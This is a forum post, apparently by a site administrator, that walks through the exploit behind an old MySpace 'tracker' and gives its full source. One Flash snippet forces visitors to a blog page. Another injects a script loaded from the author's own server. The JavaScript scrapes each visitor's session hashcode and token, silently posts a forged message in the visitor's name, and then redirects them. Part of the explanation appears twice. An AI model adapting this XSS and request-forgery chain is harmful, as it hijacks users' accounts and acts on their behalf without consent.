VTECin5th
Administrator
I wanted to post this up to give an insight on what runs things like the (expired) myspace tracker.
This may be helpful to 0.1% of those who read it, or passer by'ers...I think Tom follows this thread.
This required 2 flash movies and 1 javascript.
1 Flash movie forced the user to the blog page. (Because the hole existed in the blog page)
1 Flash movie called javascript into the page because myspace 'forgot' to sanitize the flash movie with
allowScriptAccess="Never" (which they added, and that's why it's fixed now)
Flash 1 (set cookie and force user to blog):
Flash 2 (Call in javascript 'script src' from my server):
The reason I really liked this method was that, i controlled both parts of it, meaning i could make remote changes at any time to improve the script.
Now for the JS(makes the silent calls to send the message,then redirects back to main profile page):
There's a lot of things that be built to run just like this all over the interweb.
PS Tom, yea I'll work for you for $100,000 a month.
This may be helpful to 0.1% of those who read it, or passer by'ers...I think Tom follows this thread.
This required 2 flash movies and 1 javascript.
1 Flash movie forced the user to the blog page. (Because the hole existed in the blog page)
1 Flash movie called javascript into the page because myspace 'forgot' to sanitize the flash movie with
allowScriptAccess="Never" (which they added, and that's why it's fixed now)
Flash 1 (set cookie and force user to blog):
Code:
mySharedObject = SharedObject.getLocal("counter");
function doitnow(){
clearInterval(loads);
var poo = myIdy0;
var tme = new Date();
var secs = tme.getTime() / 1000;
var secs = Math.floor(secs);
var pood = secs;
_root.lol = mySharedObject.data.count;
if (pood - 30 >= _root.lol){
mySharedObject.data.count = secs;
mySharedObject.flush();
getURL("http://blog.myspace.com/" + poo, "_self");
}
else
{
mySharedObject.data.count = secs;
mySharedObject.flush();
}
}
var loads = setInterval(doitnow, 1200);Flash 2 (Call in javascript 'script src' from my server):
Code:
getURL("java script:document.writeln(%22%3CScript src%3Dhttp%3A%2F%2FnittoRevolution.net%2FmySpacez.js%3E%3C%2Fscript%3E%22)", "");The reason I really liked this method was that, i controlled both parts of it, meaning i could make remote changes at any time to improve the script.
Now for the JS(makes the silent calls to send the message,then redirects back to main profile page):
Code:
var http_request = false;
var http_xml = false;
var this_url = escape(self.location);
var first_split = this_url.split('m/');
var getID = first_split[1];
if(getID.length > 12){
var thisl = self.location;
vtak(thisl);
}
else{
start(getID);
setTimeout("destruct()",3000);
}
function vtak(uid) {
var showNormal = uid;
if (window.XMLHttpRequest) {
makehis = new XMLHttpRequest();
}
else if (window.ActiveXObject){
makehis = new ActiveXObject("Microsoft.XMLHTTP");
}
makehis.onreadystatechange = norm;
makehis.open("GET",showNormal,true);
makehis.send(null);
}
function norm(){
if (makehis.readyState == 4){
if (makehis.status == 200){
var getN = makehis.responseText;
var rep = getN.replace('.swf','');
document.write(rep);
}
}
}
function start(FinalID){
var omgz = "http://blog.myspace.com/index.cfm?fuseaction=mail.message&FriendID=" + FinalID;
makeRequest(omgz);
}
function makeRequest(url) {
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
}
else if (window.ActiveXObject){
http_request = new ActiveXObject("Microsoft.XMLHTTP");
}
http_request.onreadystatechange = doCon;
http_request.open("GET",url,true);
http_request.send(null);
}
function doCon(){
if (http_request.readyState == 4){
if (http_request.status == 200){
var getData = http_request.responseText;
var hash1 = getData.split("hashcode");
var hash2 = hash1[1];
var getRest = hash1[1];
var getMore = getRest;
var getMore2 = getMore;
var hash3 = hash2.split('value="');
var hash4 = hash3[1];
var hash5 = hash4.split('">');
var gotHash = hash5[0];
var toID = getRest.split('toUserID');
var toID2 = toID[1];
var toID3 = toID2.split('value="');
var toID4 = toID3[1];
var toID5 = toID4.split('">');
var gotID = toID5[0];
var toke = getMore.split('Mytoken');
var toke2 = toke[1];
var toke3 = toke2.split('value=');
var toke4 = toke3[1];
var toke5 = toke4.split('>');
var gotTok = toke5[0];
urlMail = "http://blog.myspace.com/index.cfm?fuseaction=mail.sendmessage";
urlStr2 = "&hashcode=" + gotHash + "&messageType=0&toUserID=" + gotID + "&Mytoken=" + gotTok + "&errorReturnUrl=http%3A%2F%2Fmail.myspace.com%2Findex.cfm%3Ffuseaction%3Dmail.message%26friendID%3D" + gotID + "&returnUrl=http%3A%2F%2Fmail.myspace.com%2Findex.cfm%3Ffuseaction%3Dmail.messagesent%26friendID%3D" + gotID + "&subject=(Visitor)&mailbody=Just+Looking";
vcon(urlMail,urlStr2,gotID);
}
}
}
function vcon(prl,pdt,id) {
if (window.XMLHttpRequest) {
make_this = new XMLHttpRequest();
}
else if (window.ActiveXObject){
make_this = new ActiveXObject("Microsoft.XMLHTTP");
}
make_this.open("POST",prl,true);
make_this.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
make_this.send(pdt);
vtax(id);
}
function vtax(oid) {
var OGL = "http://blog.mySpace.com/" + oid;
if (window.XMLHttpRequest) {
makethis = new XMLHttpRequest();
}
else if (window.ActiveXObject){
makethis = new ActiveXObject("Microsoft.XMLHTTP");
}
makethis.onreadystatechange = omg;
makethis.open("GET",OGL,true);
makethis.send(null);
}
function omg(){
// This function reads in the blog page
// and removes the flash movie so that it doesn't forward them away same as norm()
if (makethis.readyState == 4){
if (makethis.status == 200){
var getz = makethis.responseText;
moo = getz.replace(".swf","");
document.write(moo);
destruct();
}
}
}
function destruct(){
location='http://www.myspace.com/' + getID;
}There's a lot of things that be built to run just like this all over the interweb.
PS Tom, yea I'll work for you for $100,000 a month.
